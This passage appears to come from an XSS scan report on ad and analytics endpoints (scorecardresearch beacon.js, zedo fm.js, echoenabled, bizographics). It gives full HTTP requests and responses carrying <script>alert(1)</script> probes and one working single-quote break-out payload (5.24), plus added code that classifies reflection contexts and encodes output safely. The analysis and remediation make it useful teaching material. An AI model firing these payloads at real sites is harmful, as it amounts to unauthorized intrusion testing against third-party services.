Caveat on exploitability: as with the api_key case, the response is a 403 with Content-Type: text/plain, so the injected markup is not parsed as HTML by a browser that honours the declared type. The finding stands as missing output encoding, not as demonstrated script execution.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=2c114<script>alert(1)</script>431ab9e4b41 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:58 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b42da86024eb8489645733b320;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 2c114<script>alert(1)</script>431ab9e4b41

5.15. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied unencoded into the response. The payload 632bc<a>7925c1cf403 was submitted in the q parameter and was echoed unmodified inside the errorMessage field of the error response.

The Firm rating rests on new tags appearing in the output, but the response is JSONP (Content-Type: application/x-javascript) and the payload sits inside a JSON-encoded string argument of the callback, where <a> is inert; a page that loads this URL through a script tag never parses it as HTML. Script execution would require breaking out of that string, and no payload containing a quote or backslash was tested here, so this should be treated as an unconfirmed encoding weakness until such a probe is tried. Note also that the callback parameter is reflected verbatim as the JSONP function name (jQuery16108104765831958503_1315096982333 in the response); that parameter is not covered by this finding.

Request

GET /v1/search?callback=jQuery16108104765831958503_1315096982333&q=itemsPerPage%3A5+sortOrder%3AreverseChronological+-state%3AModeratorDeleted+-state%3ASystemFlagged+-state%3AModeratorFlagged+-provider%3AContextVoice+-source%3Areuters.com+-source%3Ablogs.reuters.com++childrenof%3Ahttp%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903+632bc<a>7925c1cf403&appkey=prod.reuters.com&_=1315097065797 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Sun, 04 Sep 2011 00:50:24 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16108104765831958503_1315096982333({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"632bc<a>7925c1cf403\" at 299" });

5.16. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied unencoded into the response. The payload 7d745<script>alert(1)</script>52a1d786209 was submitted in the c1 parameter and was echoed unmodified in the application's response.

Caveat on the Certain rating: the response is a script (Content-Type: application/x-javascript) and the value lands inside a double-quoted JavaScript string literal in the COMSCORE.beacon({c1:"..."}) call, not between HTML tags. In that position <script> is inert; what would matter is whether a double quote or backslash is reflected unescaped, and the payload used here contains neither, so script execution is not demonstrated. Note also that a .js response is not rendered as HTML when navigated to directly: a string break-out would execute in the origin of whichever page embeds beacon.js with attacker-influenced parameters.

Request

GET /beacon.js?c1=87d745<script>alert(1)</script>52a1d786209&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"87d745<script>alert(1)</script>52a1d786209", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.17. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied unencoded into the response. The payload ab874<script>alert(1)</script>87274f504e7 was submitted in the c10 parameter and was echoed unmodified in the application's response.

Same context as the other beacon.js parameters: the value is reflected inside a double-quoted JavaScript string in the COMSCORE.beacon({...}) call of an application/x-javascript response, where <script> is inert. Script execution would need an unescaped double quote or backslash, which this payload does not test.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096ab874<script>alert(1)</script>87274f504e7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096ab874<script>alert(1)</script>87274f504e7", c15:"", c16:"", r:""});



5.18. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied unencoded into the response. The payload 9dc8e<script>alert(1)</script>368b40879a7 was submitted in the c15 parameter and was echoed unmodified in the application's response.

Same context as the other beacon.js parameters: the value is reflected inside a double-quoted JavaScript string in the COMSCORE.beacon({...}) call of an application/x-javascript response, where <script> is inert. Script execution would need an unescaped double quote or backslash, which this payload does not test.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15=9dc8e<script>alert(1)</script>368b40879a7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"9dc8e<script>alert(1)</script>368b40879a7", c16:"", r:""});



5.19. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied unencoded into the response. The payload b1b71<script>alert(1)</script>27ada6e0b14 was submitted in the c2 parameter and was echoed unmodified in the application's response.

Same context as the other beacon.js parameters: the value is reflected inside a double-quoted JavaScript string in the COMSCORE.beacon({...}) call of an application/x-javascript response, where <script> is inert. Script execution would need an unescaped double quote or backslash, which this payload does not test.

Request

GET /beacon.js?c1=8&c2=2113b1b71<script>alert(1)</script>27ada6e0b14&c3=13&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113b1b71<script>alert(1)</script>27ada6e0b14", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.20. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied unencoded into the response. The payload 69029<script>alert(1)</script>f027bdb3f14 was submitted in the c3 parameter and was echoed unmodified in the application's response.

Same context as the other beacon.js parameters: the value is reflected inside a double-quoted JavaScript string in the COMSCORE.beacon({...}) call of an application/x-javascript response, where <script> is inert. Script execution would need an unescaped double quote or backslash, which this payload does not test.

Request

GET /beacon.js?c1=8&c2=2113&c3=1369029<script>alert(1)</script>f027bdb3f14&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"1369029<script>alert(1)</script>f027bdb3f14", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.21. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied unencoded into the response. The payload e3c2c<script>alert(1)</script>48cdf954b23 was submitted in the c4 parameter and was echoed unmodified in the application's response.

Same context as the other beacon.js parameters: the value is reflected inside a double-quoted JavaScript string in the COMSCORE.beacon({...}) call of an application/x-javascript response, where <script> is inert. Script execution would need an unescaped double quote or backslash, which this payload does not test.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473e3c2c<script>alert(1)</script>48cdf954b23&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473e3c2c<script>alert(1)</script>48cdf954b23", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.22. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied unencoded into the response. The payload cfb0a<script>alert(1)</script>731425dd61f was submitted in the c5 parameter and was echoed unmodified in the application's response.

Same context as the other beacon.js parameters: the value is reflected inside a double-quoted JavaScript string in the COMSCORE.beacon({...}) call of an application/x-javascript response, where <script> is inert. Script execution would need an unescaped double quote or backslash, which this payload does not test.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394cfb0a<script>alert(1)</script>731425dd61f&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394cfb0a<script>alert(1)</script>731425dd61f", c6:"", c10:"239096", c15:"", c16:"", r:""});



5.23. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied unencoded into the response. The payload d842d<script>alert(1)</script>1190baab365 was submitted in the c6 parameter and was echoed unmodified in the application's response.

Same context as the other beacon.js parameters: the value is reflected inside a double-quoted JavaScript string in the COMSCORE.beacon({...}) call of an application/x-javascript response, where <script> is inert. Script execution would need an unescaped double quote or backslash, which this payload does not test.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=d842d<script>alert(1)</script>1190baab365&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"d842d<script>alert(1)</script>1190baab365", c10:"239096", c15:"", c16:"", r:""});
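
The following is an added example and is not code from the XSS.CX report or from the scanner: a small lexer that, given a JavaScript response body and the reflected probe, reports which lexical context the probe landed in and whether the probe's own characters got it back into code. That is the question the beacon.js findings above leave open, since every one of them puts the probe inside a double-quoted string. It is run on excerpts of the beacon.js line from 5.16 and, as the positive cases, the fm.js lines from 5.24 and 5.25 below (each trimmed to the line carrying the reflection). It models quoted strings, line and block comments and backslash escapes only; treating regex and template literals as absent is an assumption that holds for these responses but not for arbitrary scripts.

```javascript
// Added example (not code from the XSS.CX / Burp report): decide where a
// reflected probe lands in a JavaScript response body, and whether the
// probe's own bytes get it back into code. Models '...' and "..." strings,
// // and /* */ comments and backslash escapes; regex and template literals
// are assumed absent, which holds for the ad-tag responses in this report.

// Character(s) a payload would need, unescaped, to leave each context.
const TERMINATOR = { code: '', sq: "'", dq: '"', line: '\n', block: '*/' };

function reflectionContext(body, marker) {
  const start = body.indexOf(marker);
  if (start < 0) return null;                 // not reflected at all
  const end = start + marker.length;

  let state = 'code';
  let entry = null;      // lexical state at the first byte of the marker
  let breakout = false;  // did a byte of the marker get evaluated as code?

  for (let i = 0; i < end; i++) {
    if (entry === null && i >= start) entry = state;
    if (entry !== null && entry !== 'code' && state === 'code') breakout = true;

    const c = body[i], n = body[i + 1];
    switch (state) {
      case 'code':
        if (c === "'") state = 'sq';
        else if (c === '"') state = 'dq';
        else if (c === '/' && n === '/') { state = 'line'; i++; }
        else if (c === '/' && n === '*') { state = 'block'; i++; }
        break;
      case 'sq':
        if (c === '\\') i++;                  // skip the escaped character
        else if (c === "'") state = 'code';
        break;
      case 'dq':
        if (c === '\\') i++;
        else if (c === '"') state = 'code';
        break;
      case 'line':
        if (c === '\n') state = 'code';
        break;
      case 'block':
        if (c === '*' && n === '/') { state = 'code'; i++; }
        break;
    }
  }
  if (entry === null) entry = state;          // marker started inside an escape
  if (entry !== 'code' && state === 'code') breakout = true;  // closed on its last byte
  return { context: entry, breakout: entry === 'code' || breakout, terminator: TERMINATOR[entry] };
}

// One-line verdict for a finding, in the terms a triager needs.
function triage(body, marker) {
  const r = reflectionContext(body, marker);
  if (r === null) return 'not reflected';
  if (r.breakout) return 'breaks out of ' + r.context + ': reflected bytes run as code';
  return 'inert inside ' + r.context + ': needs an unescaped ' + JSON.stringify(r.terminator) + ' to reach code';
}

// Excerpts of the responses in this report (5.16, 5.24, 5.25), trimmed to
// the line that carries the reflection.
const COMSCORE_5_16 = 'COMSCORE.beacon({c1:"87d745<script>alert(1)</script>52a1d786209", c2:"2113", c3:"13"});';
const ZEDO_5_24 = "var zzSection=263;var zzPat='3654a';alert(1)//60894199582,a877b'';var zzCustom='';";
const ZEDO_5_25_PAT = `var zzPat='90cbc"-alert(1)-"db48eb64b4f,2f1b3"';var zzCustom='';`;
const ZEDO_5_25_STR = `var zzStr="q=90cbc"-alert(1)-"db48eb64b4f,2f1b3";z="+Math.random();`;

for (const [finding, body, marker] of [
  ['5.16 c1', COMSCORE_5_16, '87d745<script>alert(1)</script>52a1d786209'],
  ['5.24 $ in zzPat', ZEDO_5_24, "3654a';alert(1)//60894199582"],
  ['5.25 $ in zzPat', ZEDO_5_25_PAT, '90cbc"-alert(1)-"db48eb64b4f'],
  ['5.25 $ in zzStr', ZEDO_5_25_STR, '90cbc"-alert(1)-"db48eb64b4f'],
]) {
  console.log(finding + ': ' + triage(body, marker));
}
```

The c1 probe from 5.16 comes back as inert inside a double-quoted string, with a double quote named as the character the next probe would have to carry; the 5.24 single-quote payload breaks out, and the 5.25 payload breaks out of zzStr but not of zzPat, which is exactly the distinction the scanner text does not draw.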



5.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3654a'%3balert(1)//60894199582 was submitted in the $ parameter. This input was echoed as 3654a';alert(1)//60894199582 in the application's response.

This is a working break-out: in var zzPat='3654a';alert(1)//60894199582,a877b''; the reflected quote closes the literal, alert(1) runs as a statement and // comments out the rest of the line, so the script stays syntactically valid. Because fm.js is served as application/x-javascript and loaded by publisher pages through a script tag, the injected code executes in the origin of the embedding page whenever the $ value passed there is attacker-influenced; navigating to the URL directly only displays the script. Two further points are visible in this response: the same value is written back in the FFpb Set-Cookie header, and the trailing ,a877b' was not part of this request (which sent no FFpb cookie), so the server is carrying over data from an earlier probe. In 5.27 a q-parameter probe is answered with two earlier $ payloads replayed into zzPat.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted into script, it should be serialised as a JSON string literal (so quotes, backslashes and control characters are escaped) with <, >, & and the U+2028/U+2029 line terminators additionally written as \uXXXX escapes, numeric fields should be validated as numbers before emission, and the script should be served with an explicit JavaScript Content-Type and X-Content-Type-Options: nosniff.
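
An added example, not ZEDO's code (the server side of fm.js is not on this page): buildScriptUnsafe is a reconstruction of the concatenation that evidently produces var zzPat='...' in the response below, inferred from that response; buildScriptSafe is the hardened form, which emits each value as a JSON string literal with the HTML-significant characters and the U+2028/U+2029 line terminators additionally escaped and rejects a non-numeric section id. runAndReadZzPat evaluates a generated script with alert stubbed so the two can be compared on the 5.24 payload. The parameter names s and $ follow the request below; the function names are this example's own.

```javascript
// Added example (not ZEDO's code; the server side of fm.js is not on this
// page). buildScriptUnsafe reconstructs the concatenation that evidently
// produces `var zzPat='<$ value>'` in the 5.24 response; buildScriptSafe
// emits the same variables with each value serialised as a JavaScript
// string literal that cannot terminate early. Parameter names s and $
// follow the request; function names are this example's own.

function jsStringLiteral(value) {
  // JSON.stringify escapes quotes, backslashes and control characters and
  // always yields a double-quoted literal. The replacements cover what JSON
  // leaves alone but a script context cares about: '<' '>' '&' so the
  // literal can never spell </script> or an entity if the same code is
  // ever emitted inline in HTML, and U+2028/U+2029, which JSON allows raw
  // but JavaScript treats as line terminators.
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The pattern behind the finding: user data spliced between quotes.
function buildScriptUnsafe(params) {
  return "var zzSection=" + params.s + ";var zzPat='" + params.$ + "';var zzCustom='';";
}

// Hardened form: numbers are validated as numbers, strings are encoded.
function buildScriptSafe(params) {
  const section = Number.parseInt(params.s, 10);
  if (!Number.isInteger(section)) throw new TypeError('s must be an integer section id');
  return 'var zzSection=' + section + ';var zzPat=' + jsStringLiteral(params.$) + ";var zzCustom='';";
}

// Run a generated script in a fresh function scope with alert stubbed, and
// report what zzPat ended up holding and whether alert was ever called.
function runAndReadZzPat(script) {
  let fired = false;
  const alertStub = () => { fired = true; };
  const zzPat = new Function('alert', script + '\nreturn zzPat;')(alertStub);
  return { zzPat, fired };
}

const probe = "3654a';alert(1)//60894199582";              // the $ payload from 5.24
console.log(buildScriptUnsafe({ s: '263', $: probe }));   // alert(1) becomes a statement
console.log(buildScriptSafe({ s: '263', $: probe }));     // payload stays inside the literal
```

With the unsafe builder the 5.24 payload leaves zzPat holding only 3654a and calls alert; with the safe builder zzPat holds the full payload and nothing executes. The same encoder neutralises the double-quote payload from 5.25 and the <script> payloads from the beacon.js findings, because the output is always a double-quoted literal whose only way out is an escaped sequence.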

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=3654a'%3balert(1)//60894199582&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
